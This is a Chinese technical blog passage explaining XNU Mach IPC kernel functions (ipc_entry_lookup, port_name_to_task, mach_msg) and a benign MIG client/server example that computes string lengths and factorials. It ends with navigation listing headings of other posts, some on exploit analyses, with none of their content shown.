功能：在当前 task 的 IPC space 结构体中，根据传入的用户层 mach port name，获取到内核中对应的 ipc_entry_t 结构。

先上代码：

ipc_entry_t
ipc_entry_lookup(
    ipc_space_t        space,
    mach_port_name_t    name)
{
    mach_port_index_t index;
    ipc_entry_t entry;

    assert(is_active(space));
    // 获取 name 所对应的 index
    index = MACH_PORT_INDEX(name);
    if (index <  space->is_table_size) {
                entry = &space->is_table[index];
        if (IE_BITS_GEN(entry->ie_bits) != MACH_PORT_GEN(name) ||
            IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE) {
            entry = IE_NULL;        
        }
    }
    else {
        entry = IE_NULL;
    }

    assert((entry == IE_NULL) || IE_BITS_TYPE(entry->ie_bits));
    return entry;
}

在 ipc_entry_lookup 函数中，我们可以看到，mach_port_name_t (aka unsigned int) 被分为了2个部分，分别是 MACH_PORT_INDEX 与 MACH_PORT_GEN。组装方式如下所示：

#define MACH_PORT_INDEX(name)       ((name) >> 8)
#define MACH_PORT_GEN(name)         (((name) & 0xff) << 24)
#define MACH_PORT_MAKE(index, gen)  \
        (((index) << 8) | (gen) >> 24)

其中，

MACH_PORT_INDEX 用于在 task->ipc_space->is_table 中充当索引作用，有点类似于文件描述符。
MACH_PORT_GEN 说明当前 mach port 是第几代（generation）的。个人猜测这是为了将 mach port 与过去那些相同 index 但不同（且已经被释放）的 mach port 所区分开，防止混淆。

还有个需要注意的地方是，在 mach_port_name_t 中，其32位数据的用途划分如下：

+--------------------+-----+
|   is_table index   | gen |
+--------------------+-----+
32                   8     0

但在 ipc_entry 结构体中的 ie_bits 字段，其32位数据用途如下所示：

+-----+-----+------+----------------+
| gen |     | type | user-reference |
+-----+-----+------+----------------+
32    24    21     16               0

b. ipc_right_copyin

先简单了解一下函数命名规则：
xxx_copyin：发送方调用
xxx_copyout：接收方调用

ipc_right_copyin 会根据传入的 msgt_name (mach_msg_type_name_t) ，对目标 ipc_entry_t 中的 ipc_port 结构体上的某些字段进行修改操作，并返回对应的 ipc_port 结构体指针给上层调用者。

回顾一下上面 ipc_port 结构体的字段，该函数主要会对这三个字段进行增加操作：

还有些其他的我没贴上来。

1
2
3

mach_port_mscount_t ip_mscount; // make send 的次数
mach_port_rights_t ip_srights;  // send right 当前存在的发送权限的数量
mach_port_rights_t ip_sorights; // send once right 数量

该函数涉及到 mach port 的权限操作。port right 类型主要有以下几种：

#define MACH_MSG_TYPE_MOVE_RECEIVE      16    /* Must hold receive right */
#define MACH_MSG_TYPE_MOVE_SEND         17    /* Must hold send right(s) */
#define MACH_MSG_TYPE_MOVE_SEND_ONCE    18    /* Must hold sendonce right */
#define MACH_MSG_TYPE_COPY_SEND         19    /* Must hold send right(s) */
#define MACH_MSG_TYPE_MAKE_SEND         20    /* Must hold receive right */
#define MACH_MSG_TYPE_MAKE_SEND_ONCE    21    /* Must hold receive right */
#define MACH_MSG_TYPE_COPY_RECEIVE      22    /* NOT VALID */
#define MACH_MSG_TYPE_DISPOSE_RECEIVE   24    /* must hold receive right */
#define MACH_MSG_TYPE_DISPOSE_SEND      25    /* must hold send right(s) */
#define MACH_MSG_TYPE_DISPOSE_SEND_ONCE 26    /* must hold sendonce right */

这个函数我们暂时不用深入了解，只需知道该函数除了做一些 right 处理以外，还会将 ipc_entry 中的 ipc_port 结构体返回给调用者即可。

c. port_name_to_task

功能：在内核空间中，根据用户传入的 task port name （一串数字表示的值），获取所实际引用的 task 结构体指针。

代码如下：

task_t
port_name_to_task(
    mach_port_name_t name)
{
    ipc_port_t kern_port;
    kern_return_t kr;
    task_t task = TASK_NULL;

    if (MACH_PORT_VALID(name)) {
        kr = ipc_object_copyin(current_space(), name,
                       MACH_MSG_TYPE_COPY_SEND,
                       (ipc_object_t *) &kern_port);
        if (kr != KERN_SUCCESS)
            return TASK_NULL;

        task = convert_port_to_task(kern_port);

        if (IP_VALID(kern_port))
            ipc_port_release_send(kern_port);
    }
    return task;
}

该函数内部会将 task port name 传入 ipc_object_copyin 函数中，获取其对应的 task port 的 ipc_port 结构体。之后，在 convert_port_to_task 中，将 task port 对应的 ipc_port 结构体中的 ip_kobject 字段的值取出，并作为目标 task 结构体指针。

d. mach_msg

mach_msg 是用户用于发送和接受 mach message 的 API。

上个完整的流程图：

mach_msg_overwrite_trap 是 mach msg 发送与接收消息的实际内核处理函数。该函数的实现分为两部分，分别是发送消息和接收消息：

mach_msg_return_t
mach_msg_overwrite_trap(
    struct mach_msg_overwrite_trap_args *args)
{
      mach_vm_address_t     msg_addr = args->msg;
    mach_msg_option_t       option = args->option;
    mach_msg_size_t         send_size = args->send_size;
    mach_msg_size_t         rcv_size = args->rcv_size;
    mach_port_name_t        rcv_name = args->rcv_name;
    mach_msg_timeout_t      msg_timeout = args->timeout;
    mach_msg_priority_t     override = args->override;
    mach_vm_address_t       rcv_msg_addr = args->rcv_msg;
    __unused mach_port_seqno_t temp_seqno = 0;

    mach_msg_return_t  mr = MACH_MSG_SUCCESS;
    vm_map_t map = current_map();

    /* Only accept options allowed by the user */
    option &= MACH_MSG_OPTION_USER;
    
    if (option & MACH_SEND_MSG) { /* ... ipc_kmsg_send(xxx) ... */ }
    if (option & MACH_RCV_MSG) { /* ... ipc_mqueue_receive_on_thread(xxx) ... */ }
    
    return MACH_MSG_SUCCESS;
}

ipc_kmsg_t 结构体即待发送的内核消息，结构体如下：

struct ipc_kmsg {
    mach_msg_size_t            ikm_size;
    struct ipc_kmsg            *ikm_next;        /* next message on port/discard queue */
    struct ipc_kmsg            *ikm_prev;        /* prev message on port/discard queue */
    mach_msg_header_t          *ikm_header;      // 指向 Mach Message 的指针
    ipc_port_t                 ikm_prealloc;     /* port we were preallocated from */
    ipc_port_t                 ikm_voucher;      /* voucher port carried */
    mach_msg_priority_t        ikm_qos;          /* qos of this kmsg */
    mach_msg_priority_t        ikm_qos_override; /* qos override on this kmsg */
    struct ipc_importance_elem *ikm_importance;  /* inherited from */
    queue_chain_t              ikm_inheritance;  /* inherited from link */
    sync_qos_count_t sync_qos[THREAD_QOS_LAST];  /* sync qos counters for ikm_prealloc port */
    sync_qos_count_t special_port_qos;           /* special port qos for ikm_prealloc port */
#if MACH_FLIPC
    struct mach_node           *ikm_node;        /* Originating node - needed for ack */
#endif
};

该结构体中包含了较多字段，其中存在一个指向待发送 Mach message 的指针。

受限于知识储备，内核中的具体细节留待更进一步的分析。

八、MIG

1. 概述

一说到 Mach IPC 后，一个不得不提到的东西便是 MIG(Mach Interface Generator)。但这里我们不过多了解 MIG 中非常具体的使用方式与编写语法，只简单了解一下它的功能与意义等等。

通过上面的例子我们可以知道，Mach IPC 可以用与 **RPC（远程过程调用）**中。通俗的讲，它可以做到：当 Client ”调用“ 某个远程方法时，Server 将从 Mach IPC 中收到信息并实际执行该方法，最后将调用结果再通过 Mach IPC 返回给 Client，以实现 Client 的透明调用。

那么如果 Client 需要调用的方法很多，那对于开发者而言，除了需要完成方法的实际实现以外，他们还得手工完成 Mach IPC 之间的信息处理与分发等等重复乏味且机械的工作，开发效率极低。

因此， MIG 的使用可以帮助我们完成后者，解放生产力，让开发人员更关注于方法的实现。

MIG 可以从用户编写的 RPC 规范文件（.defs 文件）中，生成出 CS 架构的代码。这些代码将自动完成 Mach Message 的准备、发送、接收、解包等等功能。同时由于代码是自动生成的，因此可以提高代码一致性，降低代码发生错误的可能。

MIG 将会生成三个文件，分别是

用于用户 include 的一个头文件
client 端的一个源文件，用于和 client 的其他代码所链接。
server 端的一个源文件，用于和 server 端的其他代码所链接。这部分代码会自动完成消息接收，事件分发，函数调用，信息回复等操作。

以下是一个示例：

2. CS 架构程序示例

a. 概述

这部分我们将简单了解一下如何使用 MIG 创建一个简单的 CS 程序。

在这个 CS 架构项目中，Server 程序会提供两个接口：

string_length：获取传入字符串的长度
factorial：计算传入数字的阶乘

该示例来自于：*OS Internal Vol 1

b. 杂项公共头文件

首先，给出 Client 和 Server 的杂项公共头文件：

// misc_types.h 
 
#ifndef _MISC_TYPES_H_ 
#define _MISC_TYPES_H_ 
 
#include  
#include  
#include  
#include  
#include  
 
// The server port will be registered under this name. 
#define MIG_MISC_SERVICE "MIG-miscservice" 
 
// Data representations 
typedef char input_string_t[64]; 
typedef int xput_number_t; 
 
typedef struct { 
    mach_msg_header_t head; 
 
    // The following fields do not represent the actual layout of the request 
    // and reply messages that MIG will use. However, a request or reply 
    // message will not be larger in size than the sum of the sizes of these 
    // fields. We need the size to put an upper bound on the size of an 
    // incoming message in a mach_msg() call. 
    NDR_record_t NDR; 
    union { 
        input_string_t string; 
        xput_number_t number; 
    } data; 
    kern_return_t      RetCode; 
    mach_msg_trailer_t trailer;
} msg_misc_t; 
 
xput_number_t misc_translate_int_to_xput_number_t(int); 
int           misc_translate_xput_number_t_to_int(xput_number_t); 
void          misc_remove_reference(xput_number_t); 
kern_return_t string_length(mach_port_t, input_string_t, xput_number_t *); 
kern_return_t factorial(mach_port_t, xput_number_t, xput_number_t *); 
 
#endif // _MISC_TYPES_H_

在这个头文件中，定义了两个类型 input_string_t 和 xput_number_t，并声明了一些函数。

在这些函数中，有两个是目标接口声明，另外3个是 MIG 生成的代码内部会调用到的，一会再说明。

其中的 msg_misc_t 结构体声明只用于 Server 调用 mach_msg_server 函数时指定最大 message 长度，不会实际实例化该结构体。

c. RPC defs

之后，再给出 defs 文件：

defs 文件中的一些符号说明，已经以注释的形式写入 defs 中，下面不再赘述。

/* 
 * A "Miscellaneous" Mach Server 
 */ 
 
/* 
 * File:    misc.defs 
 * Purpose: Miscellaneous Server subsystem definitions 
 */ 
 
/* 
 * Subsystem identifier 
 * 指定当前的 mig 中的接口ID 从 500 开始，同时该文件所生成的模块均以 `misc` 命名
 * 这里的字符串也会影响到输出的 `*Server.c`、 `*User.c` 等文件的命名
 */ 
Subsystem misc 500; 
 
/* 
 * Type declarations 
 * 类型规范部分：用于定义函数调用参数的数据类型
 *     MIG支持简单类型、结构化类型、指针类型和多态类型的声明。
 */ 
#include  
#include  

type input_string_t = array[64] of char; 
/* 
 * 这里可能要稍微说明一下
 * 首先，设置 xput_number_it 的类型为 int
 * InTran 指定当函数传入 int 时，如果需要将其转换成 xput_number_t 类型，则调用 misc_translate_int_to_xput_number_t 函数转换
 * OutTran 指定当函数需要输出 int 时，如果需要将其从 xput_number_t 类型转换，则调用 misc_translate_xput_number_t_to_int 函数来转换
 * Destructor 指定当 xput_number_t 类型的变量需要析构时，执行该函数
 */
type xput_number_t  = int 
         CType      : int 
         InTran     : xput_number_t misc_translate_int_to_xput_number_t(int) 
         OutTran    : int misc_translate_xput_number_t_to_int(xput_number_t) 
         Destructor : misc_remove_reference(xput_number_t) 
    ; 
 
/* 
 * Import declarations 
 */ 
import "misc_types.h"; 
 
/* 
 * Operation descriptions 
 * 需要注意的是，每个函数声明中，至少要包含一个 mach_port_t 类型的参数。
 * 一方面，在 Client 中，这个参数指定了向哪个 Server 发起调用
 * 而另一方面，Server 中具体方法的实现也可以获取到一个 mach_port_t 类型的值，从而判断调用者
 */ 
 
/* This should be operation #500 */ 
routine string_length( 
                         server_port : mach_port_t; 
                      in instring    : input_string_t; 
                     out len         : xput_number_t); 
/* Create some holes in operation sequence */ 
// 跳过序列中的 501、502、503，这里的 skip 操作可以保持接口的兼容性，有点类似于 protobuf
Skip; 
Skip; 
Skip; 
 
/* This should be operation #504, as there are three Skip's */ 
routine factorial( 
                     server_port : mach_port_t; 
                  in num         : xput_number_t; 
                 out fac         : xput_number_t); 
 
/* 
 * Option declarations 
 * 这里设置了两个 Prefix，这些 Prefix 会分别作为所调用的/所实现的 IPC 操作函数名称前缀
 */ 
ServerPrefix Server_; 
UserPrefix   Client_;

更多 MIG defs 语法可以参照 Using Mach Messages - NeXTstep 3.3 Developer Documentation。

d. Server

Server 源程序：

// server.c 

#include 
#include "misc_types.h" 

extern boolean_t misc_server(mach_msg_header_t *inhdr, 
                             mach_msg_header_t *outhdr); 

// InTran 
xput_number_t 
misc_translate_int_to_xput_number_t(int param) { 
     printf("misc_translate_incoming(%d)\n", param); 
     return (xput_number_t)param; 
} 
 
// OutTran 
int 
misc_translate_xput_number_t_to_int(xput_number_t param) { 
     printf("misc_translate_outgoing(%d)\n", (int)param); 
     return (int)param; 
} 
 
// Destructor 
void 
misc_remove_reference(xput_number_t param) { 
     printf("misc_remove_reference(%d)\n", (int)param); 
} 
 
// an operation that we export 
kern_return_t 
string_length(mach_port_t     server_port, 
              input_string_t  instring, 
              xput_number_t  *len) 
{ 
    if (!instring || !len) 
        return KERN_INVALID_ADDRESS; 
 
    *len = strlen(instring);
 
    return KERN_SUCCESS; 
} 
 
// an operation that we export 
kern_return_t 
factorial(mach_port_t server_port, xput_number_t num, xput_number_t *fac) { 
    if (!fac) 
        return KERN_INVALID_ADDRESS; 
 
    *fac = 1; 
    for (int i = 2; i <= num; i++) 
        *fac *= i; 
 
    return KERN_SUCCESS; 
} 
 
int main(void) { 
    kern_return_t kr; 
    mach_port_t server_port;

    if ((kr = bootstrap_check_in(bootstrap_port, MIG_MISC_SERVICE, 
                                 &server_port)) != BOOTSTRAP_SUCCESS) { 
        mach_port_deallocate(mach_task_self(), server_port); 
        mach_error("bootstrap_check_in:", kr); 
        exit(1); 
    } 
    
    mach_msg_server(misc_server,            // call the server-interface module 
                    sizeof(msg_misc_t),     // maximum receive size 
                    server_port,            // port to receive on 
                    MACH_MSG_TIMEOUT_NONE); // options 
    return 0; 
}

Server 端要做的事情稍微多一点：

程序执行时，Server 将 server port 注册进 bootstrap 中。
初次之外，Server 还执行 mach_msg_server 函数，使当前进程一直循环处理 Mach Message。
mach_msg_server 函数的第一个参数指定了 MIG 生成的 misc_server 处理例程，该例程会根据传进的 Mach Message 执行指定的接口。
Server 端实现了两个接口的具体实现。当 Server 接收到 Client 端发来的信息时，这两个方法将在 miscServer.c 中被调用。
除此之外，Server 还实现了其他 MIG 中会调用的函数。

e. Client

Client 源程序：

// client.c 
 
#include "misc_types.h" 
 
#define INPUT_STRING "Hello, MIG!" 
#define INPUT_NUMBER 5 
 
int 
main(int argc, char **argv) 
{ 
    kern_return_t kr; 
    mach_port_t   server_port; 
    int           len, fac; 
 
    // look up the service to find the server's port 
    if ((kr = bootstrap_look_up(bootstrap_port, MIG_MISC_SERVICE, 
                                &server_port)) != BOOTSTRAP_SUCCESS) { 
        mach_error("bootstrap_look_up:", kr); 
        exit(1); 
    } 
 
    // call a procedure 
    if ((kr = string_length(server_port, INPUT_STRING, &len)) != KERN_SUCCESS) 
        mach_error("string_length:", kr); 
    else 
        printf("length of \"%s\" is %d\n", INPUT_STRING, len); 
 
    // call another procedure 
    if ((kr = factorial(server_port, INPUT_NUMBER, &fac)) != KERN_SUCCESS) 
        mach_error("factorial:", kr); 
    else 
        printf("factorial of %d is %d\n", INPUT_NUMBER, fac); 
 
    mach_port_deallocate(mach_task_self(), server_port); 
 
    exit(0); 
}

Client 源码较短，只做了两件事：

向 bootstrap 查询 Server 注册的 server port
向 server port 调用 string_length和 factorial 方法，需要注意到这两个方法的第一个参数均为 mach_port_t 类型，且方法的实现位于 miscUser.c
为什么这两个方法的实现位于 miscUser.c 中而不是 server.c 中？
因为对于 Client 端来说，两个方法的实际实现不归 Client 端来管，miscUser.c 中的两个同名函数最终会执行 mach IPC 向 Server 发起请求。

f. 编译与运行

使用以下命令编译并运行：

# 终端1
mig -v misc.defs 
gcc -Wall -g -o server server.c miscServer.c 
gcc -Wall -g -o client client.c miscUser.c 
./server

# 终端2
./client

这是所有源文件的关联图：

运行结果：

这是 Client 和 Server 的关系：

Kiprey's Blog

Balancer 128M Exploit Analysis

一、简介

二、Balancer Internal

1. 什么是 AMM

2. Balancer 组件

3. Balancer 交互流程

三、漏洞分析

1. 漏洞代码

2. Stable Pool 数学模型

3. 攻击流程

四、参考链接

I. Introduction

II. Balancer Internal

1. What is an AMM

2. Balancer Components

3. Balancer Interaction Flow

III. Vulnerability Analysis

1. Vulnerable Code

2. Stable Pool Mathematical Model

3. Attack Flow

IV. References

浅探 Tailscale DERP 中转服务

一、简介

二、初探 DERP 服务的初始要求

三、初探 DERP 原理

1. DERP 配置相关

2. DERP Client 配置相关

3. DERP 服务连接逻辑

4. WebSocket

5. STUN 服务

四、DERP 测试搭建

1. 安装 derper 服务

2. 创建自签名证书

3. 运行 derper 服务

4. 测试连通性

DERP

5. DEBUG 防护

6. 编写 DERP-MAP

五、Tailscale 调试环境搭建

六、DERP 搭建总结演示

1. 前置条件

2. 安装 DERP

3. 启动 DERP

DERP

4. 配置 ACL

5. 演示

七、参考链接

Curve Finance 漏洞复现

一、简介

二、环境搭建

1. Vyper 构建

2. 合约下载

三、漏洞根因

1. 安全的重入锁状态维护逻辑

2. 带有漏洞的重入锁状态维护逻辑

3. 漏洞演示

4. 漏洞修复

使用 Frpc 进行内网穿透构建 ZeroTier Moon 记录

一、简介

二、Zerotier 打洞/中继

1. 监听状态

2. 三个端口

3. 中继

三、Frpc 内网穿透

1. 做法

2. 原理

三、Frpc 测试

四、Zerotier Moon 搭建

idekCTF2022 - Coroutine Writeup

Introduction

C++20 Coroutine

Program Logic

Vulnerability

Exploit

Reference

CTF Docker 小记

简介

Docker 管理命令

Dockerfile 相关